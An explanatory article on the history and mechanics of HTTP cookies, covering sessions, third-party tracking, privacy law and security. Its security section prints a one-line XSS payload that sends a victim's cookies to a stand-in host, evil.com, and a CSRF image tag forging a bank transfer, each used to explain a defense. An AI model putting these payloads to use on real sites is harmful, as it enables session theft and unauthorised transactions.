仓库 · 1,252 字 · 5 分钟阅读

Cookies: Giving HTTP a Memory

Lou Montulli's small text files solved HTTP's statelessness problem — and accidentally created the infrastructure for login sessions, shopping carts, and the ad-tracking economy.

#TL;DR

HTTP is stateless — every request is independent, and the server forgets you the moment it responds. This was a brilliant design choice for scalability, and a terrible one for applications. You can’t have a shopping cart if the server doesn’t know who you are. In 1994, Lou Montulli, a 23-year-old engineer at Netscape, borrowed a concept from Unix called a “magic cookie” and applied it to the web: the server sends a small piece of data to the browser, and the browser sends it back with every subsequent request. That’s it. A tiny text file, round-tripping with every HTTP request, gave the stateless web a memory. Cookies enabled logins, shopping carts, preferences, and session management. They also enabled pervasive user tracking, sparking privacy battles that continue to this day. The mechanism is simple. Its consequences were not.

#The Statelessness Problem

HTTP was designed to forget. A web server handles a request, sends a response, and moves on. It doesn’t know if you’ve been here before, what you looked at, or whether you’re logged in. Every request arrives as if from a stranger.

For a library of static documents, this was fine. For a shopping site, it was a disaster:

Request 1: GET /products/widget     → "Here's the widget page"
Request 2: POST /cart/add?item=42   → "Added to... whose cart?"
Request 3: GET /cart                → "Which cart? Who are you?"

Without state, there’s no way to associate a series of requests with a single user. No login sessions. No shopping carts. No “remember me.” No multi-step forms. The web’s most important emerging use case — e-commerce — was architecturally impossible.

#Magic Cookies

In 1994, Lou Montulli was working on Netscape Navigator. The company needed a way for its online store (yes, Netscape sold software) to implement a shopping cart. Montulli needed to make HTTP remember things without changing the protocol.

The solution came from an old computing concept: the magic cookie — a small, opaque piece of data passed between programs. Unix systems had used cookies for years, and the term traces back further to the “fortune cookie” — you get a token, you hand it back later, and the system recognizes you.

Montulli’s implementation was simple. He added two HTTP headers:

The server sets a cookie:

HTTP/1.0 200 OK
Set-Cookie: session_id=abc123; Path=/; Expires=Fri, 01 Jan 1999 00:00:00 GMT

<html>Welcome to our store...</html>

The browser sends it back with every subsequent request:

GET /cart HTTP/1.0
Host: store.example.com
Cookie: session_id=abc123

The browser stores the cookie locally. Every time it makes a request to the same domain, it attaches the cookie automatically. The server reads the cookie, looks up abc123 in its session store, and knows who you are.

Montulli implemented it in Netscape Navigator in 1994. He deliberately did it without fanfare — no announcement, no user interface, no way for users to see or control cookies. They were meant to be an invisible infrastructure detail.

That decision to make cookies invisible would haunt the web for decades.

A cookie is a key-value pair with optional attributes that control its behavior:

Set-Cookie: name=value; Domain=.example.com; Path=/; Expires=...; Secure; HttpOnly; SameSite=Lax
AttributePurpose
name=valueThe actual data (max ~4KB)
DomainWhich domains receive the cookie
PathWhich URL paths receive the cookie
Expires / Max-AgeWhen the cookie dies (omit for session cookie)
SecureOnly send over HTTPS
HttpOnlyJavaScript can’t read it (XSS defense)
SameSiteControls cross-site sending (CSRF defense)

Session cookies (no Expires) vanish when the browser closes. Persistent cookies survive across sessions — they’re how “remember me” works.

// Reading cookies from JavaScript (unless HttpOnly is set)
document.cookie;
// "session_id=abc123; theme=dark; lang=en"

// Setting a cookie from JavaScript
document.cookie = "theme=dark; path=/; max-age=31536000";

The document.cookie API is famously awkward — it looks like a single string property, but setting it appends rather than replaces. Every JavaScript cookie library exists because this API is painful to use directly.

#Sessions: The Real Pattern

Cookies themselves are too small and too exposed to hold meaningful application state. The pattern that emerged — and that every web framework uses today — is server-side sessions:

1. User logs in with username + password
2. Server validates credentials
3. Server creates a session object: { userId: 42, cart: [], loggedInAt: ... }
4. Server stores it with a random ID: sessions["x7k9m2"] = { ... }
5. Server sends: Set-Cookie: sid=x7k9m2; HttpOnly; Secure
6. Browser sends "sid=x7k9m2" with every request
7. Server looks up sessions["x7k9m2"] → knows who you are

The cookie carries only an opaque identifier — a random string meaningless to anyone who doesn’t have the server’s session store. The actual state lives on the server. This is the pattern behind every login system, shopping cart, and authenticated web application.

# Simplified session flow (what frameworks like Flask/Express do internally)
import hashlib, os

sessions = {}  # in production: Redis, database, etc.

def login(username, password):
    user = authenticate(username, password)
    session_id = hashlib.sha256(os.urandom(32)).hexdigest()
    sessions[session_id] = {"user_id": user.id, "cart": []}
    # Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax
    return session_id

def get_current_user(cookie_header):
    session_id = parse_cookie(cookie_header, "sid")
    session = sessions.get(session_id)
    return session  # None if expired or invalid

#Third-Party Cookies and the Tracking Machine

Cookies were designed to be sent only to the domain that set them. A cookie from store.example.com goes back to store.example.com, not anywhere else. This is the same-origin policy for cookies.

But web pages load resources from many domains — images, scripts, fonts, ads. When an ad from tracker.adnetwork.com is embedded on news.example.com, the request to load that ad can set and read cookies for tracker.adnetwork.com. These are third-party cookies — set by a domain other than the one in the URL bar.

You visit news.example.com
  → Page loads ad from tracker.adnetwork.com
  → tracker.adnetwork.com sets: Set-Cookie: uid=user_777

You visit shopping.example.com
  → Page loads ad from tracker.adnetwork.com
  → Browser sends: Cookie: uid=user_777
  → tracker now knows user_777 reads news AND shops

This mechanism — invented to let CDNs and embedded widgets work — became the foundation of the behavioral advertising industry. Ad networks could track users across every site that embedded their code, building profiles of browsing behavior without the user’s knowledge or consent.

The backlash was slow but ultimately massive. The EU’s cookie consent directive (2009), GDPR (2018), and the “cookie banner” plague all stem from this one mechanism. Safari blocked third-party cookies by default in 2020. Firefox followed. Google has been announcing and delaying Chrome’s phase-out since 2020.

#Security: Stolen Sessions and Forged Requests

Cookies carry authentication, which makes them a prime target for attack:

Session hijacking (XSS) — if an attacker can inject JavaScript into a page, they can steal the session cookie:

// XSS attack: steal the session cookie
new Image().src = "https://evil.com/steal?c=" + document.cookie;

The defense: HttpOnly cookies, which JavaScript can’t read. The cookie still gets sent with requests, but document.cookie won’t reveal it.

Cross-Site Request Forgery (CSRF) — because cookies are sent automatically, an attacker can trick your browser into making authenticated requests:

<!-- On evil.com: the browser sends your bank's cookies automatically -->
<img src="https://bank.example.com/transfer?to=attacker&amount=10000">

Your browser dutifully attaches your bank’s session cookie to the request. The bank sees a valid session and processes the transfer.

The defense evolved over time: CSRF tokens (a random value in each form that the attacker can’t guess), and eventually the SameSite cookie attribute (2016), which tells the browser not to send cookies with cross-origin requests unless explicitly allowed.

#What Cookies Got Right

Cookies are a 32-year-old hack that bolted state onto a stateless protocol. They’ve been abused, regulated, and nearly killed. They’re still here:

  • Minimal protocol change — cookies required only two HTTP headers (Set-Cookie and Cookie). No changes to HTTP itself, no new request types, no new infrastructure. This minimalism is why they were adopted instantly and universally.
  • Server-side session pattern — the cookie-as-session-identifier model is one of web development’s most enduring patterns. Every framework in every language implements it. The abstraction — “opaque token in the cookie, real state on the server” — cleanly separates identity from data.
  • The security lessons — cookies were the battleground where the web learned about XSS, CSRF, session fixation, and secure token handling. The HttpOnly, Secure, and SameSite attributes were each added in response to a class of attacks discovered in the wild. The cookie specification is a compressed history of web security.
  • The privacy reckoning — third-party cookie tracking forced the web to confront questions it had been avoiding: Who owns browsing data? What constitutes consent? How much tracking should infrastructure enable by default? The answers — GDPR, browser privacy defaults, the slow death of third-party cookies — are reshaping the web’s business model. Cookies didn’t create the surveillance economy, but they were the mechanism that made it possible.

Cookies were a clever hack by a 23-year-old who needed shopping carts to work. They’ve outlasted every proposed replacement — from Microsoft’s Passport to various “cookieless tracking” schemes — because the pattern is fundamentally sound: a small, opaque token, round-tripped automatically, linking a series of stateless requests to a single session. The web is still stateless. Cookies are the polite fiction that it isn’t.